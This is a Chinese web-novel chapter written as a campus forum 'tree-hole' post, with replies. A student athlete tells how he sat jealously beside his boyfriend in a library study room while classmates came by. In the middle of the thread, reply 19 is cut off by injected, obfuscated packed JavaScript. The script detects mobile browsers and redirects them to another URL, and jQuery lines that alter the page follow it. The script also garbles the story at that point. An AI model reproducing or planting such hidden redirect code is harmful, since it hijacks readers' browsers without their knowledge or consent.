标题:【树洞】陪学霸男友自习是什么体验?
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
兄弟们。
今天不约会,不告白,不吃醋。
今天讲一个普通的下午。
——一个体育生陪学霸男友在图书馆自习的下午。
事情是这样的。
顾辞最近在忙两件事:支教申请和学生会的什么材料。
我不懂,反正就是很多字要写,很多表要填。
作为一个体贴的男朋友,我主动提出:“我陪你去图书馆。”
他看了我一眼,那眼神的意思是:你不无聊吗?
我说:“不无聊,看你就不无聊。”
他耳朵红了一下,没说话。
然后我们就去了。
——不过不是去普通阅览室——那儿不能说话,我倒是没问题,但他偶尔要接电话、和人讨论材料,不方便。
所以我们去的是图书馆三楼的单人研修间。
就是那种小隔间,一张桌子几把椅子,门一关,外面听不见里面。
他提前在系统上预约的,一周能约几次。
——
下午两点,图书馆三楼,研修间6号。
房间不大,一面是磨砂玻璃墙,一面是白板,中间一张长桌。
他坐里面,我坐外面。
他面前摊着一堆书、笔记本、电脑。
我面前摊着一本《足球战术图解》——装样子用的,其实半小时没翻页。
阳光从窗户照进来,落在他的侧脸上。
他低头写字,睫毛垂下来,在眼睛下面落了一小片阴影。
偶尔伸手翻书,袖口露出一小截手腕。
好看得要命。
我就那么看着他,看了半个小时。
他抬头看我:“你不看书?”
我说:“在看。”
“看什么?”
“看你。”
他瞪了我一眼。
但那个瞪,一点杀伤力都没有。
反而让我更想看他了。
——
下午两点半,有人敲门。
笃笃笃,三下,轻轻的。
顾辞说了声“请进”。
门推开,进来一个女生。
学生会的,来找顾辞商量什么“换届材料”的事。
她站在桌子旁边,弯腰跟顾辞说话。
声音细细的,态度客客气气的。
顾辞抬头听她说,偶尔点点头,偶尔回一两句。
我在旁边,假装看书。
但耳朵竖得比天线还高。
他们在说什么?
什么换届?什么候选人?什么截止时间?
我听不太懂,但有一点我听懂了——
这个女生,和顾辞很熟。
她叫他“顾辞”,不是“顾同学”,不是“学长”。
直接叫名字。
而且她说话的时候,眼睛一直盯着他看。
那眼神,怎么说呢……
不是我多想,是真的有点亮。
我在旁边坐着,突然就觉得浑身不自在。
不是生气,就是……想站起来,挡在他们中间。
但我忍住了。
我继续翻我的《足球战术图解》,假装什么也没听见。
——
她在说,我在听。
她笑了一下,我眉头皱了一下。
她又往前凑了一点,我把书翻得哗啦响。
顾辞突然抬头看了我一眼。
那眼神,好像什么都看透了。
但他没说什么,继续和那个女生说话。
又过了五分钟,女生终于走了。
临走还回头看了一眼。
我盯着她的背影,直到门关上。
然后我低头,继续看书。
但一个字也看不进去。
——
门关上之后,顾辞突然伸手,在我面前晃了晃。
“看什么呢?”
我说:“看书。”
他说:“书拿反了。”
我低头一看。
操,真的反了。
我默默把书转过来。
他在旁边笑了一下,很轻,但我听见了。
然后他说:“那是学生会的干事,来问材料的。”
我说:“哦。”
他说:“她是女生,但我对她没意思。”
我说:“我知道。”
他说:“那你拿反书?”
我说:“……”
我说:“我就是……下意识。”
他又笑了。
这次笑得明显一点,眼睛都弯起来。
然后他说:“张扬。”
“嗯?”
“你吃醋的样子,挺可爱的。”
我的脸“腾”地一下红了。
——
下午三点半,又有人敲门。
这回是个男生,高高瘦瘦的,戴着眼镜。
他是来问支教的事。
什么“面试时间”、“材料准备”、“推荐信怎么写”。
顾辞一一回答他,语气很平淡。
但我注意到一个问题——
这个男生,看顾辞的眼神也不对劲。
不是那种“请教问题”的眼神。
是那种……崇拜。
对,就是崇拜。
他听顾辞说话的时候,眼睛亮亮的,时不时点头,时不时“嗯嗯”应和。
而且他站得特别近。
近到我觉得他再往前一步,就要碰到桌子了。
我在旁边,又开始不舒服了。
这回不是拿反书的问题。
这回是我想把这个人直接请走。
——
男生问完问题,还不走。
又开始聊别的。
什么“学长你平时看什么书”、“学长你支教想去哪儿”、“学长你毕业有什么打算”。
我听着听着,手里的笔“啪”地一声,被我折断了。
男生吓了一跳,看向我。
顾辞也看向我。
我面无表情地说:“没事,笔质量不好。”
男生“哦”了一声,继续转回去和顾辞说话。
但我发现,他往后退了一步。
——可能是被我的气势吓到了。
我继续翻书,继续“看书”。
但我知道,我刚才那一下,肯定特别像恶龙在宣誓主权。
——
男生终于走了。
门关上之后,顾辞转过头看我。
他看了我一会儿,突然笑了。
那个笑,比下午的阳光还亮。
他说:“张扬,你知道你现在像什么吗?”
我说:“像什么?”
他说:“像看守公主的恶龙。”
我愣住了。
他说:“坐在那儿,竖着耳朵,盯着每一个敲门的人。”
“一有人进来,你就紧张。”
“一有人多说话,你就想赶人。”
“书拿反了都不知道。”
“笔都折断了。”
“不是恶龙是什么?”
我张了张嘴,不知道该说什么。
他继续说:“但你知道吗?”
“恶龙看守的公主,其实挺开心的。”
我心跳漏了一拍。
他说:“因为恶龙在乎她。”
“恶龙紧张她。”
“恶龙不想让别人靠近她。”
“这不就是喜欢吗?”
我看着他的眼睛,那双眼睛里有阳光,有笑意,还有我。
然后我忍不住,伸手握住了他放在桌上的手。
他愣了一下,没躲。
耳朵红红的。
但嘴角弯着。
——
后来再也没有人来敲门。
他继续写材料,我继续“看书”。
但我一直握着他的手,没松开。
他也没抽回去。
就那么让我握着。
偶尔翻书的时候,会用另一只手。
偶尔写字的时候,会用另一只手。
但被我握着的那只手,一直放在桌上。
阳光从窗户照进来,落在我们交握的手上。
暖暖的。
——
现在我已经回宿舍了。
躺在床上,满脑子都是他说的那些话。
“像看守公主的恶龙。”
“恶龙看守的公主,其实挺开心的。”
“因为恶龙在乎她。”
操。
这人怎么这么会说话?
明明是说我吃醋,明明是说我不够大度。
但被他这么一说,好像我吃醋都变成了可爱的事。
我给他发消息:
【张】:到宿舍了吗?
【圆圆】:到了。
【张】:今天下午……
【张】:我是不是太明显了?
【圆圆】:什么明显?
【张】:吃醋。
【圆圆】:还好。
【张】:还好是什么意思?
【圆圆】:就是……在意料之中。
【张】:???
【圆圆】:你上次吃我哥的醋,这次吃学生会的醋,下次吃谁的?
【张】:……
【张】:你不会嫌我烦吧?
【圆圆】:不会。
【圆圆】:你吃醋的时候,挺可爱的。
又是“可爱”。
今天他说了两次“可爱”。
我盯着那两个字,嘴角快咧到耳朵根。
然后我打字:
【张】:那你以后别让那些人靠那么近。
【张】:我会吃醋。
【圆圆】:好。
【圆圆】:那你也别让别人靠太近。
【张】:我哪有别人?
【圆圆】:足球队的那群。
【张】:他们是男的!
【圆圆】:男的也不行。
我看着那行字,笑了。
原来他也会吃醋。
原来他不是不在意。
他只是不说。
——
兄弟们。
今天下午在研修间,我像个傻子一样,拿着反了的书,盯着每一个敲门的人。
折断了一支笔,吓跑了一个男生。
但他说,那是“恶龙看守公主”。
他说,公主很开心。
我突然觉得,当恶龙也挺好的。
因为我的公主,只有我能看。
——
1楼匿名用户:
沙发!
楼主你今天不是来求助的,是来秀恩爱的!
2楼匿名用户:
“像看守公主的恶龙”哈哈哈哈哈哈!
这个比喻绝了!
3楼匿名用户:
代入一下:顾辞是公主,楼主是恶龙。
公主在研修间写材料,恶龙在旁边盯着每一个敲门的人。
有人进来,恶龙竖耳朵。
有人多说话,恶龙折笔。
哈哈哈哈哈哈太形象了!
4楼匿名用户:
楼主你是真的……占有欲爆表啊!
人家来问问题,你连笔都折了???
5楼楼主:
回4楼:我也不是故意的。
就是下意识一用力……
6楼匿名用户:
“下意识一用力”哈哈哈哈!
你那支笔做错了什么?
7楼匿名用户:
笔:我招谁惹谁了?我只是一支无辜的笔!
8楼匿名用户:
但是顾辞的反应也太甜了吧!
“恶龙看守的公主,其实挺开心的”
“因为恶龙在乎她”
这是什么神仙情话!!!
9楼匿名用户:
顾辞真的太会了!!!
明明是在说楼主吃醋,结果说成了“你在乎我所以吃醋,我开心因为你在乎我”!
逻辑闭环!!!
10楼匿名用户:
而且他还说楼主吃醋的样子“可爱”!
说了两次!
他是真的觉得楼主可爱!
11楼匿名用户:
190的体育生,折断笔,拿反书,瞪着每一个敲门的人。
然后他男朋友说:挺可爱的。
这什么偶像剧剧情???
12楼匿名用户:
我嗑死了!!!
恶龙x公主,这是什么神仙设定!!!
13楼匿名用户:
楼主你注意到没有,顾辞说“那你也别让别人靠太近”。
他也在吃醋!
吃足球队那群人的醋!
14楼匿名用户:
对对对!
“他们是男的!”“男的也不行!”
顾辞的占有欲也不差!
15楼匿名用户:
双向吃醋,双向奔赴,双向可爱!
这俩人锁死吧,钥匙我吞了!
16楼匿名用户:
话说回来,楼主你下午真的看了半小时顾辞没看书?
17楼楼主:
……
是。
18楼匿名用户:
半小时啊!
你盯着他看了半小时!
他没发现?
19楼楼主:
他发现了。
他抬头看了我一眼,说“你不
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382528|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
看书吗”,我说“看你”。
他就没再问了。
20楼匿名用户:
啊啊啊啊啊!
“看你”!
就两个字,但好甜!
21楼匿名用户:
顾辞被这么盯着看,还能专心写材料?
他定力也太强了吧!
22楼楼主:
他好像习惯了。
我平时也经常看他。
23楼匿名用户:
“平时也经常看他”……
行了,不用说了,我们知道你是恋爱脑了。
24楼匿名用户:
楼主你现在已经完全不是那个“我是直男”的楼主了。
你现在是“我是恶龙,我要看守我的公主”的楼主。
25楼匿名用户:
赛博父母很欣慰。
儿子终于找到了自己的定位。
26楼匿名用户:
话说回来,那个女生和那个男生,你们知道是谁吗?
会不会以后还来?
27楼楼主:
女生是学生会的,以后可能还会找顾辞商量事情。
男生我不认识,支教的事问完了应该不会再来了吧。
28楼匿名用户:
那你以后怎么办?
每次都在旁边盯着?
29楼楼主:
……
他说不嫌我烦。
那我就继续盯着。
30楼匿名用户:
哈哈哈哈哈哈!
“他说不嫌我烦,那我就继续盯着”!
这是什么理直气壮的占有欲!
31楼匿名用户:
顾辞:我男朋友像恶龙一样盯着每一个靠近我的人。
网友:你不烦吗?
顾辞:挺可爱的。
绝配!
32楼匿名用户:
楼主,下次别折笔了。
笔是无辜的。
你瞪他们就行。
33楼楼主:
我瞪了。
那个男生后来往后退了一步。
34楼匿名用户:
哈哈哈哈哈哈!
有效!
恶龙瞪眼技能get!
35楼匿名用户:
那下次那个女生再来,你也瞪她?
36楼楼主:
女生……
女生不太好瞪吧?
37楼匿名用户:
怎么不好瞪?
一视同仁!
恶龙不分男女!
38楼匿名用户:
对对对!
只要是靠近公主的,都瞪!
瞪到他们自动退散!
39楼楼主:
……
行吧。
我试试。
40楼匿名用户:
楼主你现在是彻底被带偏了。
但偏得好!
这才是恋爱该有的样子!
41楼匿名用户:
话说回来,你们今天下午牵手了吗?
一直握着?
42楼楼主:
嗯。
从他发现我吃醋之后,就一直握着。
他写字用另一只手,翻书用另一只手。
被我握着的那只手,一直放在桌上。
43楼匿名用户:
呜呜呜呜呜!!!
这个画面我能脑补一万遍!!!
阳光照在交握的手上!!!
这是什么偶像剧名场面!!!
44楼匿名用户:
而且顾辞居然让他握了一下午!
学霸的定力是真的强!
被握着还能专心写材料!
45楼楼主:
他说习惯了。
我平时也经常握他。
46楼匿名用户:
“平时也经常握他”……
行了行了,知道你恋爱了。
47楼匿名用户:
楼主,明天还去图书馆吗?
48楼楼主:
去。
他说材料还没写完。
我继续陪他。
还是那个研修间,他预约好了。
49楼匿名用户:
记得带本书,别拿反了。
50楼楼主:
……
知道了。
51楼匿名用户:
记得多带几支笔,别又折了。
52楼楼主:
……
好。
53楼匿名用户:
记得带水带零食,别饿着你的公主。
54楼楼主:
带了。
他喜欢吃的那个小蛋糕,我买了。
55楼匿名用户:
行吧,你已经是个合格的恶龙了。
赛博父母放心了。
56楼匿名用户:
去吧儿子。
明天继续守护你的公主。
57楼楼主:
好。
晚安。
谢谢你们。
——
【最后的最后】
张扬把手机放下。
窗外有月光。
他想起今天下午,阳光照在顾辞脸上的样子。
想起顾辞说的那些话。
想起他一直被自己握着的手。
手机震了一下。
【圆圆】:睡了?
【张】:没。
【圆圆】:在想今天下午?
【张】:嗯。
【圆圆】:我也是。
【张】:顾辞。
【圆圆】:嗯?
【张】:我明天还陪你去研修间。
【张】:还盯着每一个敲门的人。
【张】:还吃醋。
【张】:你会不会觉得我烦?
【圆圆】:不会。
【圆圆】:张扬。
【张】:嗯?
【圆圆】:你知道吗,有人在乎的感觉,很好。
【圆圆】:我以前一个人去研修间,一个人写材料,一个人做所有事。
【圆圆】:现在有个人在旁边盯着我,握着我的手,吃我的醋。
【圆圆】:挺好的。
张扬看着那几行字,眼眶有点酸。
然后快速打字:
【张】:那我以后都陪你去。
【张】:一直陪着。
【圆圆】:好。
【圆圆】:晚安,恶龙。
【张】:晚安,公主。
——
窗外有月光。
很亮。
张扬闭上眼睛,嘴角还挂着笑。
恶龙和公主。
好像也不错。